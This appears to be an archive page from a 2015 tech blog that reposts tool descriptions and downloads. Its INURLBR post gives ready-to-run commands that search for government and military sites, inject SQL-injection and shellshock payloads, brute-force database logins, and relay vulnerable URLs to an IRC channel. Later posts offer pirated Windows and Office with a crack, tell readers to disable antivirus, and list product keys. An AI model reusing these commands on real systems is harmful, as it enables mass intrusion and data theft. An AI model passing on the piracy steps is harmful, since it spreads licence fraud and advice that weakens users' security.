foxsin tech: مايو 2015

الخميس، 28 مايو 2015

The PenTesters Framework (PTF) Written In Python by TrustedSec

The PenTesters Framework (PTF) Written In Python by TrustedSec.

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing.

As pentesters, we've been accustom to the /pentest/ directories or our own tool sets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used.

PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minute.

Instructions:
First check out the config/ptf.config file which contains the base location of where to install everything. By default this will install in the /pentest directory. Once you have that configured, move to running PTF by typing ./ptf (or python ptf).

This will put you in a Metasploitesk type shell which has a similar look and feel for consistency. Show modules, use , etc. are all accepted commands. First things first, always type help or ? to see a full list of commands.

Update EVERYTHING!

If you want to install and/or update everything, simply do the following:

./ptf

use modules/install_update_all

run

This will install all of the tools inside of PTF. If they are already installed, this will iterate through and update everything for you automatically.

You can also show options to change information about the modules.

Modules:
First, head over to the modules/ directory, inside of there are sub directories based on the Penetration Testing Execution Standard (PTES) phases. Go into those phases and look at the different modules. As soon as you add a new one, for example testing.py, it will automatically be imported next time you launch PTF. There are a few key components when looking at a module that must be completed.

Below is a sample module

AUTHOR="David Kennedy (ReL1K)"

DESCRIPTION="This module will install/update the Browser Exploitation Framework (BeEF)"

INSTALL_TYPE="GIT"

REPOSITORY_LOCATION="https://github.com/beefproject/beef"

INSTALL_LOCATION="beef"

DEBIAN="ruby1.9.3,sqlite3,ruby-sqlite3"

AFTER_COMMANDS="cd {INSTALL_LOCATION},ruby install-beef,exit"

Module Development:

All of the fields are pretty easy, on the repository locations, right now all thats supported is GIT. The plan in the next release is to expand to file downloader. This can still be accomplished through after commands (explained later). Fill in the depends, and where you want the install location to be. PTF will take where the python file is located (for example exploitation) and move it to what you specify in the PTF config (located under config). By default it installs all your tools to /pentest//

Note in modules, you can specify after commands {INSTALL_LOCATION}. This will append where you want the install location to go when using after commands.

After Commands:

After commands are commands that you can insert after an installation. This could be switching to a directory and kicking off additional commands to finish the installation. For example in the BEEF scenario, you need to run ruby install-beef afterwards. Below is an example of after commands using the {INSTALL_LOCATION} flag.

AFTER_COMMANDS="cp config/dict/rockyou.txt {INSTALL_LOCATION}"

For AFTER_COMMANDS that do self install (don't need user interaction) - place an exit after your commands so it exits the shell.

TODO:
Add ability to support SVN, and FILE download.
Support other operating systems aside from Kali, Ubuntu, Debian

A TrustedSec Project - Copyright 2015

Written by: David Kennedy (@HackingDave)

Website: https://www.trustedsec.com

Download

الثلاثاء، 26 مايو 2015

New Version Scanner inurlbr Advance Search in Search Engines

# DESCRIPTION
Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.

# SCRIPT NAME: INURLBR 2.1

INURLBR scanner was developed by Cleiton Pinheiro, owner and founder of INURL - BRASIL.

Tool made in PHP that can run on different Linux distributions helps

hackers / security professionals in their specific searches.

With several options are automated methods of exploration, AND SCANNER is known for its ease of use and performasse.

The inspiration to create the inurlbr scanner, was the XROOT Scan 5.2 application.

# Long desription
The INURLBR tool was developed aiming to meet the need of Hacking community.
Purpose: Make advanced searches to find potential vulnerabilities in web
applications known as Google Hacking with various options and search filters, this tool has an absurd power of search engines available with
(24) + 6 engines special(deep web)

- Possibility generate IP ranges or random_ip and analyze their targets.
- Customization of HTTP-HEADER, USER-AGET, URL-REFERENCE.
- Execution external to exploit certain targets.
- Generator dorks random or set file dork.
- Option to set proxy, file proxy list, http proxy, file http proxy.
- Set time random proxy.
- It is possible to use TOR ip Random.
- Debug processes urls, http request, process irc.
- Server communication irc sending vulns urls for chat room.
- Possibility injection exploit GET / POST => SQLI, LFI, LFD.
- Filter and validation based regular expression.
- Extraction of email and url.
- Validation using http-code.
- Search pages based on strings file.
- Exploits commands manager.
- Paging limiter on search engines.
- Beep sound when trigger vulnerability note.
- Use text file as a data source for urls tests.
- Find personalized strings in return values of the tests.
- Validation vulnerability shellshock.
- File validation values wordpress wp-config.php.
- Execution sub validation processes.
- Validation syntax errors database and programmin.
- Data encryption as native parameter.
- Random google host.
- Scan port.
- Error Checking & values:

[*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK,[*]ERROR MARIADB,[*]ERROR MYSQL,[*]ERROR JBOSSWEB,[*]ERROR MICROSOFT,[*]ERROR ODBC,[*]ERROR POSTGRESQL,[*]ERROR JAVA INFINITYDB, [*]ERROR PHP,[*]CMS WORDPRESS,[*]SHELL WEB,[*]ERROR JDBC, [*]ERROR ASP,[*]ERROR ORACLE,[*]ERROR DB2,[*]JDBC CFM,[*]ERROS LUA,[*]ERROR INDEFINITE

# Screenshot:

# LIB & PERMISSION:

PHP Version 5.4.7
php5-curl LIB
php5-cli LIB
cURL support enabled
cURL Information 7.24.0
allow_url_fopen On
permission Reading & Writing
User root privilege, or is in the sudoers group
Operating system LINUX
Proxy random TOR

[ + ] PERMISSION EXECUTION: chmod +x inurlbr.php
[ + ] INSTALLING LIB CURL: sudo apt-get install php5-curl
[ + ] INSTALLING LIB CLI: sudo apt-get install php5-cli
[ + ] INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en

resume:
apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl

# HELP:

-h
--help   Alternative long length help command.
--ajuda Command to specify Help.
--info   Information script.
--update Code update.
-q       Choose which search engine you want through [1...24] / [e1..6]]:
     [options]:
     1   - GOOGLE / (CSE) GENERIC RANDOM / API
     2   - BING
     3   - YAHOO BR
     4   - ASK
     5   - HAO123 BR
     6   - GOOGLE (API)
     7   - LYCOS
     8   - UOL BR
     9   - YAHOO US
     10 - SAPO
     11 - DMOZ
     12 - GIGABLAST
     13 - NEVER
     14 - BAIDU BR
     15 - YANDEX
     16 - ZOO
     17 - HOTBOT
     18 - ZHONGSOU
     19 - HKSEARCH
     20 - EZILION
     21 - SOGOU
     22 - DUCK DUCK GO
     23 - BOOROW
     24 - GOOGLE(CSE) GENERIC RANDOM
     ----------------------------------------
                 SPECIAL MOTORS
     ----------------------------------------
     e1 - TOR FIND
     e2 - ELEPHANT
     e3 - TORSEARCH
     e4 - WIKILEAKS
     e5 - OTN
     e6 - EXPLOITS SHODAN
     ----------------------------------------
     all - All search engines / not special motors
     Default:    1
     Example: -q {op}
     Usage:   -q 1
              -q 5
               Using more than one engine: -q 1,2,5,6,11,24
               Using all engines:      -q all

--proxy Choose which proxy you want to use through the search engine:
     Example: --proxy {proxy:port}
     Usage:   --proxy localhost:8118
              --proxy socks5://googleinurl@localhost:9050
              --proxy http://admin:12334@172.16.0.90:8080

--proxy-file Set font file to randomize your proxy to each search engine.
     Example: --proxy-file {proxys}
     Usage:   --proxy-file proxys_list.txt

--time-proxy Set the time how often the proxy will be exchanged.
     Example: --time-proxy {second}
     Usage:   --time-proxy 10

--proxy-http-file Set file with urls http proxy,
     are used to bular capch search engines
     Example: --proxy-http-file {youfilehttp}
     Usage:   --proxy-http-file http_proxys.txt


--tor-random Enables the TOR function, each usage links an unique IP.

-t Choose the validation type: op 1, 2, 3, 4, 5
     [options]:
     1   - The first type uses default errors considering the script:
     It establishes connection with the exploit through the get method.
     Demo: www.alvo.com.br/pasta/index.php?id={exploit}

     2   - The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'
     It also establishes connection with the exploit through the get method
     Demo: www.alvo.com.br/pasta/index.php?id={exploit}

     3   - The third type combine both first and second types:
     Then, of course, it also establishes connection with the exploit through the get method
     Demo: www.target.com.br{exploit}
     Default:    1
     Example: -t {op}
     Usage:   -t 1

     4   - The fourth type a validation based on source file and will be enabled scanner standard functions.
     The source file their values are concatenated with target url.
     - Set your target with command --target {http://target}
     - Set your file with command -o {file}
     Explicative:
     Source file values:
     /admin/index.php?id=
     /pag/index.php?id=
     /brazil.php?new=
     Demo:
     www.target.com.br/admin/index.php?id={exploit}
     www.target.com.br/pag/index.php?id={exploit}
     www.target.com.br/brazil.php?new={exploit}

     5   - (FIND PAGE) The fifth type of validation based on the source file,
     Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
     - Set your target with command --target {http://target}
     - Set your file with command -o {file}
     Explicative:
     Source file values:
     /admin/admin.php
     /admin.asp
     /admin.aspx
     Demo:
     www.target.com.br/admin/admin.php
     www.target.com.br/admin.asp
     www.target.com.br/admin.aspx
     Observation: If it shows the code 200 will be separated in the output file

--dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'

--dork-file Set font file with your search dorks.
     Example: --dork-file {dork_file}
     Usage:   --dork-file 'dorks.txt'

--exploit-get Defines which exploit will be injected through the GET method to each URL found.
     Example: --exploit-get {exploit_get}
     Usage:   --exploit-get "?'´%270x27;"

--exploit-post Defines which exploit will be injected through the POST method to each URL found.
     Example: --exploit-post {exploit_post}
     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'

~~--exploit-command~~ Defines which exploit/parameter will be executed in the options: --command-vul/ --command-all.
     The exploit-command will be identified by the paramaters: --command-vul/ --command-all as _EXPLOIT_
     Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'
     _TARGET_ is the specified URL/TARGET obtained by the process
     _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.
     Example: --exploit-command {exploit-command}
     Usage:   --exploit-command '/admin/config.conf'

-a Specify the string that will be used on the search script:
     Example: -a {string}
     Usage:   -a '<title>hello world</title>'

-d Specify the script usage op 1, 2, 3, 4, 5.
     Example: -d {op}
     Usage:   -d 1 /URL of the search engine.
              -d 2 /Show all the url.
              -d 3 /Detailed request of every URL.
              -d 4 /Shows the HTML of every URL.
              -d 5 /Detailed request of all URLs.
              -d 6 /Detailed PING - PONG irc.

-s Specify the output file where it will be saved the vulnerable URLs.

     Example: -s {file}
     Usage:   -s your_file.txt

-o Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
     Example: -o {file_where_my_urls_are}
     Usage:   -o tests.txt

--persist Attempts when Google blocks your search.
     The script tries to another google host / default = 4
     Example: --persist {number_attempts}
     Usage:   --persist 7

--ifredirect Return validation method post REDIRECT_URL
     Example: --ifredirect {string_validation}
     Usage:   --ifredirect '/admin/painel.php'

-m Enable the search for emails on the urls specified.

-u Enables the search for URL lists on the url specified.

--gc Enable validation of values with google webcache.

--pr Progressive scan, used to set operators (dorks),
     makes the search of a dork and valid results, then goes a dork at a time.

--file-cookie Open cookie file.

--save-as Save results in a certain place.

--shellshock Explore shellshock vulnerability by setting a malicious user-agent.

--popup Run --command all or vuln in a parallel terminal.

--cms-check Enable simple check if the url / target is using CMS.

--no-banner Remove the script presentation banner.

--unique Filter results in unique domains.

--beep Beep sound when a vulnerability is found.

--alexa-rank Show alexa positioning in the results.

--robots Show values file robots.

--range Set range IP.
      Example: --range {range_start,rage_end}
      Usage:   --range '172.16.0.5#172.16.0.255'

--range-rand Set amount of random ips.
      Example: --range-rand {rand}
      Usage:   --range-rand '50'

--irc Sending vulnerable to IRC / server channel.
      Example: --irc {server#channel}
      Usage:   --irc 'irc.rizon.net#inurlbrasil'

--http-header Set HTTP header.
      Example: --http-header {youemail}
      Usage:   --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'

--sedmail Sending vulnerable to email.
      Example: --sedmail {youemail}
      Usage:   --sedmail youemail@inurl.com.br

--delay Delay between research processes.
      Example: --delay {second}
      Usage:   --delay 10

--time-out Timeout to exit the process.
      Example: --time-out {second}
      Usage:   --time-out 10

--ifurl Filter URLs based on their argument.
      Example: --ifurl {ifurl}
      Usage:   --ifurl index.php?id=

--ifcode Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:   --ifcode 200

--ifemail Filter E-mails based on their argument.
     Example: --ifemail {file_where_my_emails_are}
     Usage:   --ifemail sp.gov.br

--url-reference Define referring URL in the request to send him against the target.
      Example: --url-reference {url}
      Usage:   --url-reference http://target.com/admin/user/valid.php

--mp Limits the number of pages in the search engines.
     Example: --mp {limit}
     Usage:   --mp 50

--user-agent Define the user agent used in its request against the target.
      Example: --user-agent {agent}
      Usage:   --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
      Usage-exploit / SHELLSHOCK:
      --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
      Complete command:
      php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'

--sall Saves all urls found by the scanner.
     Example: --sall {file}
     Usage:   --sall your_file.txt

--command-vul Every vulnerable URL found will execute this command parameters.
     Example: --command-vul {command}
     Usage:   --command-vul 'nmap sV -p 22,80,21 _TARGET_'
              --command-vul './exploit.sh _TARGET_ output.txt'
              --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

--command-all Use this commmand to specify a single command to EVERY URL found.
     Example: --command-all {command}
     Usage:   --command-all 'nmap sV -p 22,80,21 _TARGET_'
              --command-all './exploit.sh _TARGET_ output.txt'
              --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'
    [!] Observation:

    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.

    _TARGETFULL_ will be replaced by the original URL / target found.

    _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.

    _TARGETIP_ return of ip URL / target found.

    _URI_ Back URL set of folders / target found.

    _RANDOM_ Random strings.

    _PORT_ Capture port of the current test, within the --port-scan process.

    _EXPLOIT_ will be replaced by the specified command argument --exploit-command.
   The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_

--replace Replace values in the target URL.
    Example: --replace {value_old[INURL]value_new}
     Usage:   --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'
              --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'
              --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'

--remove Remove values in the target URL.
      Example: --remove {string}
      Usage:   --remove '/admin.php?id=0'

--regexp Using regular expression to validate his research, the value of the
    Expression will be sought within the target/URL.
    Example: --regexp {regular_expression}
    All Major Credit Cards:
    Usage:    --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'

    IP Addresses:
    Usage:    --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'

    EMAIL:
    Usage:    --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'


---regexp-filter Using regular expression to filter his research, the value of the
     Expression will be sought within the target/URL.
    Example: ---regexp-filter {regular_expression}
    EMAIL:
    Usage:    ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'

    [!] Small commands manager:

--exploit-cad Command register for use within the scanner.
    Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
    Example Format: NMAP::nmap -sV _TARGET_
    Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
    Usage:    --exploit-cad 'NMAP::nmap -sV _TARGET_'
    Observation: Each registered command is identified by an id of your array.
                 Commands are logged in exploits.conf file.

--exploit-all-id Execute commands, exploits based on id of use,
    (all) is run for each target found by the engine.
     Example: --exploit-all-id {id,id}
     Usage:   --exploit-all-id 1,2,8,22

--exploit-vul-id Execute commands, exploits based on id of use,
    (vull) run command only if the target was considered vulnerable.
     Example: --exploit-vul-id {id,id}
     Usage:   --exploit-vul-id 1,2,8,22

--exploit-list List all entries command in exploits.conf file.

    [!] Running subprocesses:

--sub-file Subprocess performs an injection
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt

--sub-get defines whether the strings coming from
     --sub-file will be injected via GET.
     Usage:   --sub-get

--sub-post defines whether the strings coming from
     --sub-file will be injected via POST.
     Usage:   --sub-get


--sub-cmd-vul Each vulnerable URL found within the sub-process
     will execute the parameters of this command.
     Example: --sub-cmd-vul {command}
     Usage:   --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'
              --sub-cmd-vul './exploit.sh _TARGET_ output.txt'
              --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

--sub-cmd-all Run command to each target found within the sub-process scope.
     Example: --sub-cmd-all {command}
     Usage:   --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'
              --sub-cmd-all './exploit.sh _TARGET_ output.txt'
              --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'

--port-scan Defines ports that will be validated as open.
     Example: --port-scan {ports}
     Usage:   --port-scan '22,21,23,3306'

--port-cmd Define command that runs when finding an open door.
     Example: --port-cmd {command}
     Usage:   --port-cmd './xpl _TARGETIP_:_PORT_'
              --port-cmd './xpl _TARGETIP_/file.php?sqli=1'

--port-write Send values for door.
     Example: --port-write {'value0','value1','value3'}
     Usage:   --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"

    [!] Modifying values used within script parameters:

md5 Encrypt values in md5.
     Example: md5({value})
     Usage:   md5(102030)
     Usage:   --exploit-get 'user?id=md5(102030)'

base64 Encrypt values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'

hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'

Generate random values.
     Example: random({character_counter})
     Usage:   random(8)
     Usage:   --exploit-get 'user?id=random(8)'

# COMMANDS SIMPLE:

./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'

./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'

./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'

./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 _TARGET_'

./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'

./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'

./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u

./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6

./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'

./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6

./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'

./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>'

./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5

./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_'

./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'

./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8

./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8   --pr

./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8   --pr --shellshock

./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --sub-file 'xpls_Arbitrary_File_Download.txt'

# Installation
Preferably, you can download inurlbr by cloning the
[Git](https://github.com/googleinurl/SCANNER-INURLBR)
repository:

git clone https://github.com/googleinurl/SCANNER-INURLBR.git inurlbr

The inurlbr works with
[php](http://php.net/downloads.php)
version **5.4.x** linux platforms.

# Giving permission to script execution:

$chmod +x inurlbr.php
Executar: ./inurlbr.php

# Usage

To get a list of basic options and switches use:
    php inurlbr.php -h

To get a list of all options and switches use:
    python inurlbr.php --help

# Demos:
https://www.youtube.com/playlist?list=PLV1376pVwcCmcoCmq_Z4O0ra4BqjmhIaR
# Tutoriais: (http://blog.inurl.com.br/search/label/INURLBR)
# IRC: irc.rizon.net / #inurlbrasil
# UPDATES: https://github.com/googleinurl/SCANNER-INURLBR

# GROUP INURL BRASIL - ADVANCED SEARCH.
# AUTOR:        Cleiton Pinheiro / Nick: googleINURL
# EMAIL:        inurlbr@gmail.com
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# Pastebin      http://pastebin.com/u/Googleinurl
# GIT:          https://github.com/googleinurl
# PSS:          http://packetstormsecurity.com/user/googleinurl
# EXA:          http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE:      http://youtube.com/c/INURLBrasil
# PLUS:         http://google.com/+INURLBrasil
# SCRIPT NAME:  INURLBR
# Codename:     Subversive
# Version:      2.1.0

الاثنين، 25 مايو 2015

Ricochet: Peer-to-Peer Instant Anonymous Messaging Chat

Ricochet: Peer-to-Peer Instant Anonymous Messaging Chat

Anonymous metadata-resistant instant messaging that just works. Ricochet is an experiment with a different kind of instant messaging that doesn't trust anyone with your identity, your contact list, or your communications.

You can chat without exposing your identity (or IP address) to anyone
Nobody can discover who your contacts are or when you talk (metadata-free!)
There are no servers or operators to compromise that could access your information
It's cross-platform and easy for non-technical users

How it works

Ricochet is a peer-to-peer instant messaging system built on Tor hidden services. Your login is your hidden service address, and contacts connect to you (not an intermediate server) through Tor. The rendezvous system makes it extremely hard for anyone to learn your identity from your address.

Ricochet is not affiliated with or endorsed by The Tor Project.

For more information, you can read about Tor and learn about Ricochet's design or protocol (or the old protocol). Everything is open-source and open to contribution.

Experimental

This software is an experiment. It hasn't been audited or formally reviewed by anyone. Security and anonymity are difficult topics, and you should carefully evaluate your risks and exposure with any software. Do not rely on Ricochet for your safety unless you have more trust in my work than it deserves. That said, I believe it does more to try to protect your privacy than any similar software.

Downloads

Ricochet is available for Windows, OS X (10.7 or later), and as a generic Linux binary package. Visit the releases page for the latest version and change log.

الأحد، 24 مايو 2015

Leveraging Log Data for Network Monitoring

Leveraging Log Data for Network Monitoring [WhitePaper]

Research has found that data is actually the most common data source in use today for planning, monitoring, and troubleshooting network health and performance.

Enterprise Management Associates (EMA) published “Log Analytics for Network Operations Management.” This research report documented current use cases and best practices for using log data as part of network management.

Download this FREE Whitepaper

And to learn the answers to these questions:

What log analytic features provide the best value?
How important is integration of logs with other performance metrics?
Which advanced analytic techniques are companies using the most?

Offered Free by: SevOne

Windows 7 Ultimate 32 E 64 Bits Chave E Ativador

Windows 7 Ultimate SP1 imagem original da Microsoft, apenas foi integrado o Internet Explorer 11 Final + Atualizações até 11-04-2014.
Ativador Microsoft Toolkit 2.5.1 (não incluso dentro da ISO).
.NET Frameworks 4, 4.5 e suas atualizações.

Nada foi retirado. em um link único pelo MEGA muito fácil para baixar

Qual a diferença do Windows 7 Ultimate para o Profissional?
Windows 7 Professional

Mais voltada para as pequenas empresas, a versão Professional do Windows 7 possuirá diversos recursos que visam facilitar a comunicação entre computadores e até mesmo impressoras de uma rede corporativa.

Para isso foram desenvolvidos aplicativos como o Domain Join, que ajuda os computadores de uma rede a “se enxergarem” e conseguirem se comunicar. O Location Aware Printing, por sua vez, tem como objetivo tornar muito mais fácil o compartilhamento de impressoras.

Como empresas sempre estão procurando maneiras para se proteger de fraudes, o Windows 7 Professional traz o Encrypting File System, que dificulta a violação de dados. Esta versão também será encontrada em lojas de varejo ou computadores novos.

2° Windows 7 Ultimate

Esta será, provavelmente, a versão mais cara de todas, pois contém todas as funcionalidades já citadas neste artigo e mais algumas. Apesar de sua venda não ser restrita às empresas, o Microsoft disponibilizará uma quantidade limitada desta versão do sistema.

Isso porque grande parte dos aplicativos e recursos presentes na Ultimate são dedicados às corporações, não interessando muito aos usuários comuns.

Software
Plataforma operacional: Windows x32
Compativel com: Windows 7 Pro

Hardware
Memória RAM: 256MB
Memória de vídeo: 32MB
Processador: 1Ghz

Tutorial como criar um Pen Drive com Windows Bootavel
Veja o vídeo explicado passo a passo :

Tamanho: 3.51GB
Formato: ISO
Facilidade de Uso: 10
Interface Gráfica: 10
Número de Mídias: 1 DVD
Idioma: PT-BR

Download TORRENT

Download TORRENT 32 BITS:

Download TORRENT

Download TORRENT 64 BITS:

ou

DOWNLOAD BR2SHARE

32 BITS

Download BR2Shared

Download BR2Share 32 bits - Parte 1::

Download BR2Shared

Download BR2Share 32 bits - Parte 2::

Download BR2Shared

Download BR2Shared 32 bits - Parte 3::

ou

64 BITS

Download BR2Shared

Download BR2Share 64 bits - Parte 1::

Download BR2Shared

Download BR2Share 64 bits - Parte 2::

Download BR2Shared

Download BR2Share 64 bits - Parte 3::

The 3 Pillars of IT Service Management Excellence

"The 3 Pillars of IT Service Management Excellence" –

You know more than anyone that managing the IT service desk is a challenging job - and one that's getting more demanding by the day.

New devices and apps, mobility, distributed networks and an increasingly IT-savvy user-base all add pressure to processes and budgets.

Offered Free by: Service Now

Request free Infographic Download

Office 2013 Chave E Ativador Torrent

Está versão você tem a opção de baixar somente o 32 Bits ou 64 Bits sozinho e também o 32 e 64 Bits juntos facilitando para você escolher qual das versões ou toda a versão em um único arquivo...

Microsoft Office Professional Plus 2013 SP1 x64 -PT-BR

Novos recursos

Microsoft lançou o Office 2013 Service Pack 1. O pacote inclui vários patches;cumulativo;, melhor suporte para hardware moderno e atualizações, incluindo a transição SkyDrive-a-OneDrive.

Especificamente, o SP1 inclui:

Correções de compatibilidade para o Windows 8.1 e Internet Explorer 11;

Melhor suporte para hardware moderno, tais como dispositivos de alta resolução e novos, touchpads de precisão;

Novo aplicativos para escritório capacidades e APIs para desenvolvedores;

Ferramenta de visualização 3D Mapa de Energia para o Excel , que já está disponível para clientes do Office 365 ProPlus subscrição;

Melhorias na tecnologia Click-to-Run virtualização que instala e atualizações do Office 365 aplicações desktop;

Uma atualização para o SkyDrive Pro, que agora é OneDrive for Business.

A Microsoft também disse que todas as atualizações cumulativas e outros patches que foram lançados desde dezembro foram incluídos, parte dos patches acumulativos

Tutorial – Como Instalar:

1º Baixe o programa e descompacte-o;

2º Desative seu antivírus, pois o ativador (crack) pode ser acusado como vírus;

3º Após descompactar a pasta “Microsoft Toolkit 2.5.2? clique com o botão direito no programa e clique em “Executar como administrador”;

4º Após abrir o programa, clique no ícone do Office;

5º Clique na aba Activation;

6º Clique em EZ-Activator;

Pronto! Seus Office já está ativado

Office 2013 Serial Key-01 ( JR3N8-YV72J-86V92-HC2PM-PRXTW )

Office 2013 Serial Key-02 ( Y89N6-KWWJX-YHFVP-DWMGK-XKR9J )

